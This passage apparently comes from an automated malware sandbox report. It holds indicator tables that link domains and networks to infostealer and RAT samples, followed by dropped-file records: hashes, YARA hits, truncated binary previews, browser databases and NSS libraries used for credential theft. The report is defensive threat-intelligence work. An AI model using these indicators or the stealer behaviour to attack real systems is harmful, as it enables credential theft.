	172.104.150.66.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	VertusinstruccionesFedEX_66521.zip	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	UjbjOP.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	I9xuKI2p2B.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	licarisan_api.exe	Get hash	malicious	Icarus	Browse	ipinfo.io/ip

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chrome.cloudflare-dns.com	file.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	33abb.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	56ff7c.msi	Get hash	malicious	Unknown	Browse	162.159.61.3
	57ff67.msi	Get hash	malicious	Unknown	Browse	162.159.61.3
	setup (2).msi	Get hash	malicious	Unknown	Browse	162.159.61.3
	setup.msi	Get hash	malicious	Unknown	Browse	162.159.61.3
	Non_disclosure_agreement.lnk.download.lnk	Get hash	malicious	Unknown	Browse	172.64.41.3
	Document.lnk.download.lnk	Get hash	malicious	Unknown	Browse	172.64.41.3
	Nieuwebestellingen10122024.exe	Get hash	malicious	FormBook	Browse	172.64.41.3
	751ietQPnX.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.159.61.3
star-mini.c10r.facebook.com	https://connect-velocity-33392.my.salesforce-sites.com/help	Get hash	malicious	Unknown	Browse	157.240.196.35
	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse	157.240.196.35
	http://annavirgili.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	157.240.196.35
	http://annavirgili.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	157.240.196.35
	https://www.amberdrinks.lt/	Get hash	malicious	Unknown	Browse	157.240.196.35
	http://annavirgili.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	157.240.196.35
	https://feji.us/m266he	Get hash	malicious	Unknown	Browse	157.240.195.35
	http://get-derila.com	Get hash	malicious	Unknown	Browse	157.240.196.35
	vFile__0054seconds__Arkansas.html	Get hash	malicious	Unknown	Browse	157.240.195.35
	Final Demand to Harbor Wholesale Grocery Inc.pdf	Get hash	malicious	Unknown	Browse	157.240.196.35
twitter.com	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse	104.244.42.193
	https://feji.us/m266he	Get hash	malicious	Unknown	Browse	104.244.42.129
	k5NcGFI29j.exe	Get hash	malicious	Jigsaw	Browse	104.244.42.65
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	104.244.42.193
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.193
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.193
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.129
services.addons.mozilla.org	k5NcGFI29j.exe	Get hash	malicious	Jigsaw	Browse	151.101.129.91
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
KLNOPT-ASFI	tjpq0h4wEH.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	LxYpBRhMBx.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
WHOLESALECONNECTIONSNL	fWAr4zGUkY.exe	Get hash	malicious	Remcos, Amadey, Stealc	Browse	185.215.113.206
	ZzS8KjNjr7.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.16
	Szi2WJUKmv.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.43
	aYxpioi6G3.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	PGkSZbFKmI.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.16
	FAz4V7wbYU.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.16
	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse	185.215.113.16
	XUd96YD9O6.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	vuxDaHveW5.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	3jr0P5izLl.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	file.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	34.117.59.81
	Josho.mips.elf	Get hash	malicious	Unknown	Browse	34.119.80.120
	http://enteolcl.top/	Get hash	malicious	Unknown	Browse	34.117.59.81
	Product Blueprint..html	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	k5NcGFI29j.exe	Get hash	malicious	Jigsaw	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	156917
Entropy (8bit):	7.994509354006501
Encrypted:	true
SSDEEP:	3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
MD5:	F89267B24ECF471C16ADD613CEC34473
SHA1:	C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
SHA-256:	21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
SHA-512:	C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
Malicious:	false
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, Author: ditekSHen
Reputation:	unknown
Preview:	.PNG........IHDR................p....IDATx....\|.e....3......D dw6...S..Y.[......#L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.\|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	123394
Entropy (8bit):	7.993523589542907
Encrypted:	true
SSDEEP:	1536:NoxiTioXtBWFfsYExW94I9tiiGCidzWdZNF9p3Ymn9Zqmi943C42nYEmL9yqhTjV:yxFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre
MD5:	53E54AC43786C11E0DDE9DB8F4EB27AB
SHA1:	9C5768D5EE037E90DA77F174EF9401970060520E
SHA-256:	2F606D24809902AF1BB9CB59C16A2C82960D95BFF923EA26F6A42076772F1DB8
SHA-512:	CD1F6D5F4D8CD19226151B6674124AB1E10950AF5A049E8C082531867D71BFAE9D7BC65641171FD55D203E4FBA9756C80D11906D85A30B35EE4E8991ADB21950
Malicious:	false
Reputation:	unknown
Preview:	PK........DwiY(..wj...........graph.exe..{\|...8......f....D]5..HP..d..... Q@b.1.[$.\..&.p.....j.-.V..6...=P!.U@...K....>.sf7..b...._/...3....<....oY/..A...................u....].l.(...UyWuv....\x....w.......0\|_.].e........==.m.qq....v....g...~o.........~.V?@.s.......z.......#\|.o..........~.].X...%.A......>..xZ.p.0.:.2a.U..PZ...E.^.`>......+d.9..s.x..O.....+............K.2...3...9.M......k3;j.[o.*mg..U.%!...A+.....3O6T{...o....j.:.4.]m...q.{..&...?.A....Q[.\|..x.K.X....U.\|..V/,......6...\|w.s..@0BX...O.I..._..R..@~T.2.t..IK?..M.E.\|^............B._C.....-..y;....V.......,\|f.wl......:...T./4TbV.\.+..H.....2%.sZ..D.#..}.o..x..w... ..p.!..,..o ...S.]......].}.......c.w..2...<s........!.2'....m.v.><...Ox...O.(C.....@....T.o.Uwm......(ve<...x.f3..\...D..X._.G.7.3.l;..>tQ...5.e..D...lO.i{./..;.JgK........ ...tJ. I.....>..8..Pa...=.Il.S..?.)..@}...:..Cmh.;.v...T.{K..9.)Pqg.%..5.....6..<w..........`-..+h..oA...2.K.......{.."..Wu.;I..w.^o...

C:\Program Files\Windows Media Player\graph\graph.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	251392
Entropy (8bit):	6.173345887744036
Encrypted:	false
SSDEEP:	6144:TxwndeWCdXSpfDYlUgEP86yZ7JUlfQEc:Tx1dXYYlLEP8l7J8
MD5:	7D254439AF7B1CAAA765420BEA7FBD3F
SHA1:	7BD1D979DE4A86CB0D8C2AD9E1945BD351339AD0
SHA-256:	D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
SHA-512:	C3164B2F09DC914066201562BE6483F61D3C368675AC5D3466C2D5B754813B8B23FD09AF86B1F15AB8CC91BE8A52B3488323E7A65198E5B104F9C635EC5ED5CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.1!am_ram_ram_r.\sdm_r.Zs.m_rq.\skm_rq.[sqm_r.[spm_rq.Zs8m_r.^shm_ram^r.m_r.Vs`m_r.r`m_r*.]s`m_rRicham_r........PE..d...../g.........."....).\|...n.................@............................. ............`.....................................................d...............`'...................A..p...........................`@..@...............h............................text....z.......\|.................. ..`.rdata..............................@..@.data...$-..........................@....pdata..`'.......(..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

C:\ProgramData\DBAEHCGHIIIDHIECFHJDHDGHDB

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03799545499236577
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZru/bNb/fc3DDTnHI:58r54w0VW3xWZrwbFHc3T
MD5:	96AB9233CA2AB3982F98B1BA44CFFE32
SHA1:	A72C6AF1881274392B7D73594D78C4D3F1B91428
SHA-256:	C764FE5DA2665335A3C2E60091F08E21A16CEC35EFD453AE092FEB1D7C3D69BC
SHA-512:	E09E96834C049E56FE5E9A56BA1635CA6A4FB5DF2F2EB8F339C94D4BCF2D24150592B2833D084BD4BD7D0319B4D5C493B5B49A64310E084684375D645DD8CEEC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGCGDBGCAAEBFIECGHDGCAAEGD

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGDBAFHJJDAKEBGCFCBG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	ASCII text, with very long lines (1808), with CRLF line terminators
Category:	dropped
Size (bytes):	12814
Entropy (8bit):	5.448756185888108
Encrypted:	false
SSDEEP:	192:cnBRNZ3YbBp6M1R1+PaX56/x8lz9/3/7ao5RHNBw8dXSl:cel1M/xU9bPwG0
MD5:	F4B8B77C8BB1E375605D81E7B80A13B4
SHA1:	D8E32789CE08EC5AA0DCA6CE25AF9086EF1CF07E
SHA-256:	3A21804422A0472E025D2B19C8A482C52D722AD80768F60EBA74E4E7B8409763
SHA-512:	5E02105E543A5BEB4FFB2B16C8DBFCC81D9C74C9337DE38F4925328D3C1A02E929774BBEBDDEC51F3B796EB182A3616A3B1430794C76DED62974265DBEE91FA4
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "ecedec8f-7097-47fc-a9e3-d74f0c8e2503");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696499493);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1734018583);..user_pref("app.up

C:\ProgramData\EHIJJDGDHDGDAKFIECFI

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIJEGDAK

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1211596417522893
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
MD5:	0AB67F0950F46216D5590A6A41A267C7
SHA1:	3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
SHA-256:	4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
SHA-512:	D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCFBAFID

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1368932887859682
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
MD5:	9A534FD57BED1D3E9815232E05CCF696
SHA1:	916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
SHA-256:	7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
SHA-512:	ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDBKFHIJKJKECAAAECAE

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FBFF.tmp.fcxcx.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3293
Entropy (8bit):	5.3364558769830905
Encrypted:	false
